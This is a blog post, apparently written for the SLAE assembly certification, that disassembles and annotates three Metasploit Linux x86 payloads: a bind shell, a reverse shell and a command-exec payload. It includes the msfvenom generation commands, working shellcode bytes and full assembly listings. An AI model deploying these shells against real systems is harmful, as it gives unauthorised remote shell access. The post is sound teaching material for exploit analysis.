SLAE Assignment 5 – MSF Analysis

15 minute read


The 5th assignment for SLAE is to analyze 3 msfvenom payloads. For this excercise, I thought I would revisit some semi-familiar code in the:

  • linux/x86/shell_bind_tcp,
  • linux/x86/shell_reverse_tcp, and
  • linux/x86/exec payloads.

My primary reason for doing this is because we’ve written similar code already and I want to see how the pros do it when contributing to Metasploit and see if we can pick up some new tricks/efficiencies.

Analyzing Shellcode #1 (linux/x86/shell_bind_tcp)

The first thing we need to do is generate the shellcode that corresponds with this MSF payload. We’ll need to add arguments as well, such as designate a listening port. We can do this with the following command: msfvenom -p linux/x86/shell_bind_tcp lport=5555 -f c

root@kali:~# msfvenom -p linux/x86/shell_bind_tcp lport=5555 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 78 bytes
Final size of c file: 354 bytes
unsigned char buf[] = 

Now that we have our shellcode, we can feed it to ndisasm, which comes stock on Kali Linux, with the following command and get some assembly out of it!

root@kali:~# echo -ne "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x68\x02\x00\x15\xb3\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" | ndisasm -u -

After running this command, we get the following output:

00000000  31DB              xor ebx,ebx
00000002  F7E3              mul ebx
00000004  53                push ebx
00000005  43                inc ebx
00000006  53                push ebx
00000007  6A02              push byte +0x2
00000009  89E1              mov ecx,esp
0000000B  B066              mov al,0x66
0000000D  CD80              int 0x80
0000000F  5B                pop ebx
00000010  5E                pop esi
00000011  52                push edx
00000012  68020015B3        push dword 0xb3150002
00000017  6A10              push byte +0x10
00000019  51                push ecx
0000001A  50                push eax
0000001B  89E1              mov ecx,esp
0000001D  6A66              push byte +0x66
0000001F  58                pop eax
00000020  CD80              int 0x80
00000022  894104            mov [ecx+0x4],eax
00000025  B304              mov bl,0x4
00000027  B066              mov al,0x66
00000029  CD80              int 0x80
0000002B  43                inc ebx
0000002C  B066              mov al,0x66
0000002E  CD80              int 0x80
00000030  93                xchg eax,ebx
00000031  59                pop ecx
00000032  6A3F              push byte +0x3f
00000034  58                pop eax
00000035  CD80              int 0x80
00000037  49                dec ecx
00000038  79F8              jns 0x32
0000003A  682F2F7368        push dword 0x68732f2f
0000003F  682F62696E        push dword 0x6e69622f
00000044  89E3              mov ebx,esp
00000046  50                push eax
00000047  53                push ebx
00000048  89E1              mov ecx,esp
0000004A  B00B              mov al,0xb
0000004C  CD80              int 0x80

This output is very nice, but it’s not quite what we’re accustomed to. Let’s use awk to get just the assembly instructions.

echo -ne "<SHELLCODE>" | ndisasm -u - | awk '{ print $3,$4,$5 }'

Now we get just the assembly to print to the terminal and we can throw this into a NASM sytnax highlighter.

xor ebx,ebx 
mul ebx 
push ebx 
inc ebx 
push ebx 
push byte +0x2
mov ecx,esp 
mov al,0x66 
int 0x80 
pop ebx 
pop esi 
push edx 
push dword 0xb3150002
push byte +0x10
push ecx 
push eax 
mov ecx,esp 
push byte +0x66
pop eax 
int 0x80 
mov [ecx+0x4],eax 
mov bl,0x4 
mov al,0x66 
int 0x80 
inc ebx 
mov al,0x66 
int 0x80 
xchg eax,ebx 
pop ecx 
push byte +0x3f
pop eax 
int 0x80 
dec ecx 
jns 0x32 
push dword 0x68732f2f
push dword 0x6e69622f
mov ebx,esp 
push eax 
push ebx 
mov ecx,esp 
mov al,0xb 
int 0x80

Let’s break this down and see how it differs from our bind shell that we wrote.

The first thing we’ll notice is repeated use of the same syscall socketcall() instead of 4 separate syscalls like we did. sockecall() works by storing a SYS_CALL value in ebx, creating the arguments on the stack for the subordinate syscall (like bind or listen for example), and then having ecx point to esp where the beginning of the arguments are located. It’s a much more uniform and in my opinion clean way of executing the shellcode.

Syscall 1 socketcall() with SYS_SOCKET

First, let’s look at the argument structure of socketcall(). The man page gives the argument structure as int socketcall(int call, unsigned long *args);. call can be satisfied with a reference to what socket function you want to use, in thise case we’ll want to use SYS_SOCKET which has a value of 1, and then we’ll input arguments to satisfy the SYS_SOCKET call as we’re familiar with from our code.

Let’s look at how this plays out in assembly.

xor ebx,ebx 
mul ebx 
push ebx 
inc ebx 
push ebx 
push byte +0x2
mov ecx,esp 
mov al,0x66 
int 0x80 

One thing that’s different is the way they’re clearing the registers. By using mul which has storage destinations of eax and edx, they’re able to save a line of code by not having to specify xor register, register twice.

Next they increment ebx so that it will equal 0x1 and satisfy the SYS_SOCKET argument. It was pushed onto the stack before incrementing to satisfy the protocol value needed for SYS_SOCKET which should be 0 as it was in our bind shell. ebx is then pushed onto the stack to satisfy the SOCK_STREAM argument as we did. Then a value of 0x2, to represent the value of PF_INET, is pushed onto the stack just as we did.

Lastly, ecx is given the address of esp so that it references our arguments that we just created on the stack and then the interrupt is called. Also, let’s not forget that the sockfd will be needed later and that’s stored in eax by default.

Syscall 2 socketcall() with SYS_BIND

This is the structure from the man page on bind(): int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen); As we know already, building this struct in reverse order on the stack is the most difficult part of the entire shellcode.

  • int sockfd is taken care of, thats stored in eax.
  • the struct will consist of 0 ( listening address), 0xb315 (port 5555), and AF_INET (2).
  • socklen_t addrlen will be 16

Let’s see how they pulled this off in the assembly.

pop ebx                   ; I like this, this pops 0x2 into $ebx and satisfies our SYS_BIND requirement
pop esi                   ; not sure what this is doing yet
push edx                  ; $edx is still zeroed out so this will be the beginning of our struct (
push dword 0xb3150002     ; putting our listening port (5555) onto the stack and our AF_INET value (2)
push byte +0x10           ; finishing up with pushing 16 length onto the stack
push ecx                  ; pushing a pointer to our sockaddr
push eax                  ; this is our sockfd, or did you forget?!
mov ecx,esp               ; ecx has to point to the location of all these args we've created
push byte +0x66           
pop eax                   ; calling socketcall()
int 0x80 

Awesome, not too many unique things there, though I will say for the most part they make more use of pushing values onto the stack and then popping them into register than I have.

Syscall 3 socketcall() with SYS_LISTEN

If you don’t remember, the argument structure for listen() is listen(sockfd, queueLimit). This part of the code is pretty self-explanatory. ecx will point to the args by default because it’s not touched in this code segement and is still referencing esp from previous code segment.

mov [ecx+0x4],eax ; [ecx+0x4] is going to reference a location on the stack so we're placing our sockfd onto the stack
mov bl,0x4        ; for SYS_LISTEN which has a value of 4
mov al,0x66       ; calling socketcall()     
int 0x80 

Syscall 4 socketcall() with SYS_ACCEPT

The unique thing about accept() is that it will generate a new sockfd for us instead of the one we’ve been using that we’ll need to store and reference.

inc ebx         ; ebx now becomes 5 for SYS_ACCEPT
mov al,0x66     
int 0x80

Again, ecx already points to the beginning of the arguments so we’re good to go.

Syscall 5 dup2()

dup2() is going to take a sockfd created from our accept() call and then duplicate the 0, 1, and 2 file descriptors in the ecx registers which correspond to stdin, stdout, stderr respectively in order to make the shell interactive. Let’s see how they implement this.

xchg eax,ebx        ; $ebx now has our new sockfd
pop ecx             ; this is going to be our counter register
push byte +0x3f     ; pushing the syscall value for dup2()
pop eax         
int 0x80            ; done calling dup2()
dec ecx             ; decrement our counter
jns 0x32            ; jump near if not sign, a.k.a. SF=0

Lesson learned here, the original ndisasm output told us that 0x32 was a reference to:

00000032 6A3F push byte +0x3f

So now we know if that condition is not meant, this is where we loop back to. Very cool way of constructing the loop.

Syscall 6 execve()

This syscall is one of the most standardized syscalls you can make in assembly so I doubt there will be much variance here.

push dword 0x68732f2f       ; pushing 'hs//' onto the stack
push dword 0x6e69622f       ; pushing 'nib/' onto the stack, now we have /bin//sh on the stack!
mov ebx,esp                 ; $ebx now points to the string we want to execute
push eax                    ; terminator
push ebx                    ; push the value of the previous stack pointer onto the stack
mov ecx,esp                 ; save new stack pointer
mov al,0xb 
int 0x80

Some things we picked up for our future code writing:

  • the mul register clear to save bytes
  • creatively utilizing the stack to avoid mov operations
  • utilizing socketcall() instead of separate syscalls
  • utilizing the xchg opcode

Analyzing Shellcode #1 (linux/x86/reverse_bind_tcp)

The first thing we need to do is generate the shellcode that corresponds with this MSF payload. We’ll need to add arguments as well, such as designate a listening port. We can do this with the following command: msfvenom -p linux/x86/shell_reverse_tcp lhost= lport=5555 -f c

root@kali:~# msfvenom -p linux/x86/shell_reverse_tcp lhost= lport=5555 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes
Final size of c file: 311 bytes
unsigned char buf[] = 

Run our ndisasm command:

root@kali:~# echo -ne "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x7f\x00\x00\x01\x68\x02\x00\x15\xb3\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" |ndisasm -u -


00000000  31DB              xor ebx,ebx
00000002  F7E3              mul ebx
00000004  53                push ebx
00000005  43                inc ebx
00000006  53                push ebx
00000007  6A02              push byte +0x2
00000009  89E1              mov ecx,esp
0000000B  B066              mov al,0x66
0000000D  CD80              int 0x80
0000000F  93                xchg eax,ebx
00000010  59                pop ecx
00000011  B03F              mov al,0x3f
00000013  CD80              int 0x80
00000015  49                dec ecx
00000016  79F9              jns 0x11
00000018  687F000001        push dword 0x100007f
0000001D  68020015B3        push dword 0xb3150002
00000022  89E1              mov ecx,esp
00000024  B066              mov al,0x66
00000026  50                push eax
00000027  51                push ecx
00000028  53                push ebx
00000029  B303              mov bl,0x3
0000002B  89E1              mov ecx,esp
0000002D  CD80              int 0x80
0000002F  52                push edx
00000030  686E2F7368        push dword 0x68732f6e
00000035  682F2F6269        push dword 0x69622f2f
0000003A  89E3              mov ebx,esp
0000003C  52                push edx
0000003D  53                push ebx
0000003E  89E1              mov ecx,esp
00000040  B00B              mov al,0xb
00000042  CD80              int 0x80

Let’s use cut out the assembly with by piping the output to awk with: echo -ne "<SHELLCODE>" | ndisasm -u -| awk '{print $3,$4,$5,$6}' and paste it into nasm syntax highlighter.

xor ebx,ebx  
mul ebx  
push ebx  
inc ebx  
push ebx  
push byte +0x2 
mov ecx,esp  
mov al,0x66  
int 0x80  
xchg eax,ebx  
pop ecx  
mov al,0x3f  
int 0x80  
dec ecx  
jns 0x11  
push dword 0x100007f 
push dword 0xb3150002 
mov ecx,esp  
mov al,0x66  
push eax  
push ecx  
push ebx  
mov bl,0x3  
mov ecx,esp  
int 0x80  
push edx  
push dword 0x68732f6e 
push dword 0x69622f2f 
mov ebx,esp  
push edx  
push ebx  
mov ecx,esp  
mov al,0xb  
int 0x80

Alright, let’s analyze this code. As you have probably already figured out, they’re using socketcall() again. This should be familiar territory for us at this point.

Syscall 1 socketcall() with SYS_SOCKET

Let’s keep in mind the argument structure for SYS_SOCKET: socket(PF_INET (2), SOCK_STREAM (1), IPPROTO_IP (0))

xor ebx,ebx         ; clear out ebx
mul ebx             ; clear out eax and edx
push ebx            ; pushing 0 onto stack for the IPPROTO_IP
inc ebx             ; pushing 1 onto the stack for SOCK_STREAM
push ebx  
push byte +0x2      ; pushing 2 onto the stack for PF_INET
mov ecx,esp         ; $ecx has to point at our args location
mov al,0x66  
int 0x80
xchg eax,ebx        ; storing the sockfd in ebx   

We are getting good at this! Most of this makes sense to us at this point and matches up nicely with our bind shell analysis.

Syscall 2 dup2()

This is interesting, it looks like this code calls dup2() before connect() which is different from our code.

mov al,0x3f   ; 0x3f is the value for dup2
int 0x80      ; call dup2
dec ecx       ; decrese counter register
jns 0x11      ; jump near if not sign

This is a similar set-up to our dup2() loop in the MSF bind shell that we evaluated. 0x11 here is just a reference to the location of that first instruction mov al,0x3f so as it loops through its iterations if the jns condition is not satisfied it will continue to loop. Here’s the relevant line from the ndisasm dump:

00000011  B03F              mov al,0x3f

Syscall 3 socketcall() with SYS_CONNECT

connect() behaves very similarly to bind() so keep in mind the argument structure for both, particularly the struct portion: int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen).

push dword 0x100007f      ; pushing remote IP 
push dword 0xb3150002     ; pushing port 5555 and AF_INET 
mov ecx,esp               ; pointing $ecx to the struct's location on the stack
mov al,0x66               ; socketcall()
push eax                  
push ecx                  ; sockaddr_in* addr 
push ebx                  ; pushing the sockfd
mov bl,0x3                ; SYS_CONNECT
mov ecx,esp  
int 0x80  

This is all pretty familiar to the code we analyzed for the MSF bind payload.

Syscall 4 execve()

This is similar to the MSF bind payload we analyzed, but not identical.

push edx                  ; pushing a null terminator onto the stack
push dword 0x68732f6e     ; pushing 'hs//' onto the stack
push dword 0x6e69622f     ; pushing 'nib/' onto the stack, now we have /bin//sh on the stack!
mov ebx,esp               ; preserving this stack pointer in $ebx
push edx                  ; another null terminator
push ebx                  ; the stack pointer address we had stored in $ebx
mov ecx,esp               ; $ecx has to have the address of the stack pointer for our completed args
mov al,0xb                ; execve()
int 0x80

All in all there were the same lessons learned. It emphasizes more succicnt assembly. Why use 3 lines of code when you can accomplish the same goal in 2? There are definitely some areas we can improve our code going forward.

Analyzing Shellcode #3 (linux/x86/exec)

For this payload you have specify a CMD parameter which will represent an arbitrary command you want to run on the victim host. Let’s choose ls as our command and see how the folks contributing to Metasploit pull this off with their shellcode.

root@kali:~# msfvenom -p linux/x86/exec CMD=ls -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 38 bytes
Final size of c file: 185 bytes
unsigned char buf[] = 

Let’s plug the shellcode into ndisasm and dump the assembly code with the following command:

root@kali:~# echo -ne "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x6c\x73\x00\x57\x53\x89\xe1\xcd\x80" | ndisasm -u -


00000000  6A0B              push byte +0xb
00000002  58                pop eax
00000003  99                cdq
00000004  52                push edx
00000005  66682D63          push word 0x632d
00000009  89E7              mov edi,esp
0000000B  682F736800        push dword 0x68732f
00000010  682F62696E        push dword 0x6e69622f
00000015  89E3              mov ebx,esp
00000017  52                push edx
00000018  E803000000        call 0x20
0000001D  6C                insb
0000001E  7300              jnc 0x20
00000020  57                push edi
00000021  53                push ebx
00000022  89E1              mov ecx,esp
00000024  CD80              int 0x80

Using our aforementioned awk command to just retrieve the assembly for syntax highlighting.

push byte +0xb
pop eax 
push edx 
push word 0x632d
mov edi,esp 
push dword 0x68732f
push dword 0x6e69622f
mov ebx,esp 
push edx 
call 0x20 
jnc 0x20 
push edi 
push ebx 
mov ecx,esp 
int 0x80 

Ok, let’s jump into some analysis. Right off the bat we see they are using execve by placing 0xb into eax. Let’s look at the next section of code.

cdq                       ; this will clear $edx to zero, a clever new trick for us
push edx                  ; push a null onto the stack
push word 0x632d          ; pushing the string for '-c' onto the stack which will be used along with '/bin/sh' to specify our 'ls' cmd
mov edi,esp               ; store a stack pointer to our arg structure into $edi
push dword 0x68732f        
push dword 0x6e69622f     ; pushing '/bin/sh' onto the stack
mov ebx,esp               ; storing this stack pointer to this arg structure in ebx
push edx                  ; push null onto stack

This is relatively familiar to us so far. Let’s go deeper.

call 0x20         ; call here to the instruction at 0x20 which is 'push edi' which we stored our stack pointer in
jnc 0x20

insb and jnc 0x20 are very interesting. Let’s examine the value stored there from our ndisasm ouput:

  • 0000001D 6C insb
  • 0000001E 7300 jnc 0x20

A hex converter will tell us that 6C is l while 73 is s. So this is how the program get’s ls onto the stack followed by the 00 terminator. A call opcode will store the address of the next command onto the stack, so we’ve successfully placed the address of our command onto the stack. This is a very cool trick we can begin to incorporate into our shellcode.

Let’s finish up.

push edi        ; pushes $edi onto the stack which stores the address of '-c' remember
push ebx        ; pushes address of '/bin/sh' onto stack
mov ecx,esp     ; finally, this will move into $ecx the stack pointer which will complete the entire command '/bin/sh -c ls'
int 0x80 

Lessons Learned

Using a call to store instruction addresses on the stack is a very cool trick that we were familiar with from writing JMP CALL POP shellcode, but I needed reminding that it is valuable outside of decoder stub construction!

Another thing was that linux/x86/shell_reverse_tcp and linux/x86/exec shellcode had several NULL BYTEs. This is a great reminder to specify bad characters when generating payloads with msfvenom.

This was a great excercise and it was very fun to look at how the shellcode we use everyday generated from msfvenom actually works.


This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

Student ID: SLAE-1458

You can find all of the code used in this blog post here.